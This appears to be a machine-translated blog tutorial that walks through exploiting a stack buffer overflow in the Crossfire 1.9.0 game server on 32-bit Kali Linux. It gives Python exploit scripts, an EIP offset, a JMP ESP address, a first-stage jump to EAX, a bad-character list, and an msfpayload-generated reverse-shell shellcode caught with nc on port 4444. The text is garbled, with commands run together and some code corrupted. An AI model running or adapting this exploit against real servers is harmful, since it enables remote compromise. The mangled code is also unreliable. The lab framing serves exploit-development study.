Small white diary 18:kali infiltration test buffer Overflow Instance (ii)--linux, through the FireWire 1.9.0

The Linux system crosses the FireWire-buffer overflow

Principle: Crossfire 1.9. Version 0 There is a buffer overflow vulnerability when an inbound socket connection is accepted.

Tools:

Debugging Tools: EDB;

# # #python在漏洞溢出方面的渗透测试和漏洞攻击中, with a great advantage

Experimental object: Crossfire "multiplayer online RPG game"

Operating platform: Kali i686 Virtual Machine "32-bit, the number of computer CPUs refers to address bus bits, 64-bit system address space for 2^64, addressing too large, difficult to handle, in order to simplify this chapter operation, so choose 32-bit"

Building an experimental environment

#linux中, games need to be installed with their game folder

Server-side Programs

[Email protected]:~# cd \desktop[email protected]:~/desktop# lscrossfire.tar.gz[email protected]:~/desktop# MV Crossfire.tar.gz/usr/games[email protected]:~/desktop# Cd/usr/games/[email protected]:/usr/games# Lscrossfire.tar.gz[email protected]:/usr/games# tar zxpf crossfire.tar.gz[email protected]:/usr/games# ls-lhtotal 4.8mdrwxr-xr-x 8 root root 4.0K Feb  crossfire-rwxrwx---1 root root 4.8M 05:16 Crossfire.tar.gz[email p rotected]:/usr/games# CD crossfire/[email protected]:/usr/games/crossfire# CD Bin/[email protected]:/usr/games/ crossfire/bin# lscrossedit  crossfire-config  crossloop.pl   player_dl.plcrossfire  crossloop         

#若出现缺少什么组件, you can install the corresponding, as long as you see the waiting for connect, it is basically no problem
View port Open Status "13327"

[Email protected]:~# netstat-pantuactive Internet connections (servers and established) Proto recv-q send-q Local address< C0/>foreign Address         State       pid/program name    TCP        0      0 0.0.0.0:13327           0.0.0.0:*               LISTEN      4147/./crossfire    UDP        0      0 0.0.0.0:68              0.0.0.0:*                           629/dhclient        

Debugging Tools

# # #也可用命令行来打开

New version of Linux kernel supports memory protection mechanism

DEP, ASLR, stack cookies, stack smash

Native debugging "Prevents unauthorized network access during penetration testing to prevent hackers from hacking into the computer"

Iptables-a input-p tcp--destination-port 13327 \! -D 127.0.0.1-j DROP #只有通过本机访问本地网卡的13327

Iptables-a input-p tcp--destination-port 4444 \! -D 127.0.0.1-j DROP #只有通过本机访问本地网卡4444

[Email protected]:~# iptables-a input-p tcp--destination-port 13327 \! -D 127.0.0.1-j drop[email protected]:~# iptables-a input-p tcp--destination-port 4444 \! -D 127.0.0.1-j drop[email protected]:~# iptables-lchain INPUT (policy ACCEPT) target     prot opt source               destination         DROP       TCP-  anywhere            !localhost            tcp dpt:13327drop TCP-  anywhere            ! localhost            tcp dpt:4444chain FORWARD (policy ACCEPT) target     prot opt source               destination         Chain OUTPUT (policy ACCEPT) target     prot opt source               destination         

Debugging Tools

To start a service for debugging using the EDB debugging tool

EDB--run/usr/games/crossfire/bin/crossfire

#需要重复点击两个Debug->run

To view the register address such as EIP, double-click

01.py

#!/usr/bin/pythonimport sockethost = "127.0.0.1" crash = "\x41" * 4379           # # #crossfire必须在发送数值大小在一个固定数值的时候才能发生缓冲区溢出, Only when 4379 characters are sent can it be accurate to the overflow position # #buffer = "\x11 (Setup Sound" +crash+ "\x90\x90#)" s = Socket.socket (socket.af_inet,socket. SOCK_STREAM) print "[*]sending evil buffer ..." S.connect ((host,1327)) data = S.RECV (1024x768) print datas.send (buffer) S.close () print "[*]payload sent!"

EDB if a buffer overflow occurs, the next instruction cannot be carried out, there will be an alarm pop-up window

can confirm a buffer overflow vulnerability

#通过修改发送 the value of "A" to verify that the EIP register can be modified only if the number of characters is 4379

Unique string positioning the EIP position precisely

/USR/SHARE/METASPLOIT-‐FRAMEWORK/TOOLS/EXPLOIT/PATTERN_CREATE.RB 4379

Add a unique string to 02.py

Double-click Eip

Use./pattren_offset.rb to calculate offsets

Then four characters after 4368 are EIP addresses

Verify Location 03.py

View ESP Data section fellow in Dump

# # #因为ESP只能添7个字符才能精确修改EIP, so shellcode cannot be placed in the ESP register. So look for the rest of the registers

Find EAX and find it available

"Because the setup sound is a server directive, the first 12 characters must first send the setup sound"

There is a theory that directly adds 12 to the address of the EAX, which can be achieved by jumping, but it may not be possible to overflow after changing a machine, because the EAX address of different systems may not be the same

Idea: "The universality of consideration"

First stage Shellcode: Jump from ESP "7 bytes" to EAX, implement offset 12-bit characters in ESP

# # #一个5个字节, enough to plug in ESP, to jump to eax

\x83\xc0\x0c\xff\xe0\x90\x90 #\x90: Jump character to prevent filtering "the computer reads the data in the order contrary to the human reading order"

04.py

View ESP

#因为ESP的内存地址也不是固定的, so we need to find a fixed jump module in the system.

Addressing

Using the plugins in EDB opcode search

Using the first process 08048000, as long as the program is running, this process will always exist and can be used to find jmp ESP

# # #EIP->jmp esp->esp->eax

Find bad characters

###\x00\x0a\x0d\x20

Find each of the 256 encodings in the script

Set Breakpoints (0x08134597)

eip--08134597

Then the EIP jump address is

Crash = "\x41" * 4368 + "\x97\x45\x13\x08" "EIP" + "\x83\xc0\x0c\xff\xe0\x90\x90" "EAX"

04+.py

Set breakpoints

Run [F9]

Press F8 to perform the next step

Press F8 and jump into ESP register

Replace 4,368 characters with Shellcode, remaining bits continue to fill "A" "shellcode number of characters to be calculated"

Generate Shellcode Pose

[Email protected]:/usr/share/framework2#./msfpayload linux_ia32_reverse lhost=127.0.0.1 LPORT=4444 R |./msfencode-b " \x00\x0a\x0d\x20 "

Note: When generating shellcode, if the generated shellcode is incorrect, it can be resolved by rebooting

#!/usr/bin/pythonimport sockethost = "127.0.0.1" Shellcode = ("\xbb\x6d\x65\x9b\xcd\xdb\xdd\xd9\x74\x24\xf4\x5f\x2b\ Xc9 "+" \XB1\X14\X83\XC7\X04\X31\X5F\X10\X03\X5F\X10\X8F\X90\XAA "+" \x16\xb8\xb8\x9e\xeb\x15\x55\x23\x65\x78\x19\ X45\xb8\xfa "+" \x01\xd4\x10\x92\xb7\xe8\x85\x3e\xd2\xf8\xf4\xee\xab\x18 "+" \x9c\x68\xf4\x17\xe1\xfd\x45\xac\x51\ XF9\XF5\XCA\X58\X81 "+" \xb5\xa2\x05\x4c\xb9\x50\x90\x24\x85\x0e\xee\x38\xb0\xd7 "+" \x08\x50\x6c\x07\x9a\xc8\x1a\ x78\x3e\x61\xb5\x0f\x5d\x21 "+" \x1a\x99\x43\x71\x97\x54\x03 ") crash = Shellcode +" A "* (4368-105) +" \x97\x45\x13\x08 "+ "\x83\xc0\x0c\xff\xe0\x90\x90" buffer = "\x11 (Setup Sound" +crash+ "\x90\x90#)" s = Socket.socket (socket.af_inet,socket . SOCK_STREAM) print "[*]sending evil buffer ..." S.connect ((host,13327)) data = S.RECV (1024x768) print datas.send (buffer) S.close () print "[*]payload sent!"

#打开侦听4444端口 "Getshell when someone connects 4444."

NC 127.0.0.1 4444 # # #获得shell

Little white Diary, not to be continued ...

Small white diary 18:kali infiltration test buffer Overflow Instance (ii)--linux, through the FireWire 1.9.0